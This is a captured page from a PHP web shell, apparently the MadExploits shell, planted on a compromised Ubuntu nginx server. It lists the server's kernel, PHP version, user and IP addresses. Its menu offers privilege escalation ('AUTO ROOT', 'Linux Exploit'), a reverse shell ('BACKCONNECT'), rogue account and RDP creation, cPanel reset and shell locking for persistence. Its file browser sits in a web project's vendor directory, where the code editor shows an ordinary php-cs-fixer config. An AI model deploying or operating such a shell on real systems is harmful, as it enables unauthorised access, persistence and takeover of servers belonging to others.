Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
vendor /
guzzlehttp /
guzzle /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxr-x
.php_cs
645
B
-rwxrwxr-x
CHANGELOG.md
77.33
KB
-rwxrwxr-x
Dockerfile
387
B
-rwxrwxr-x
LICENSE
1.43
KB
-rwxrwxr-x
README.md
4.1
KB
-rwxrwxr-x
UPGRADING.md
49.58
KB
-rwxrwxr-x
composer.json
2.34
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .php_cs
<?php $config = PhpCsFixer\Config::create() ->setRiskyAllowed(true) ->setRules([ '@PSR2' => true, 'array_syntax' => ['syntax' => 'short'], 'declare_strict_types' => false, 'concat_space' => ['spacing'=>'one'], 'php_unit_test_case_static_method_calls' => ['call_type' => 'self'], 'ordered_imports' => true, // 'phpdoc_align' => ['align'=>'vertical'], // 'native_function_invocation' => true, ]) ->setFinder( PhpCsFixer\Finder::create() ->in(__DIR__.'/src') ->in(__DIR__.'/tests') ->name('*.php') ) ; return $config;
Close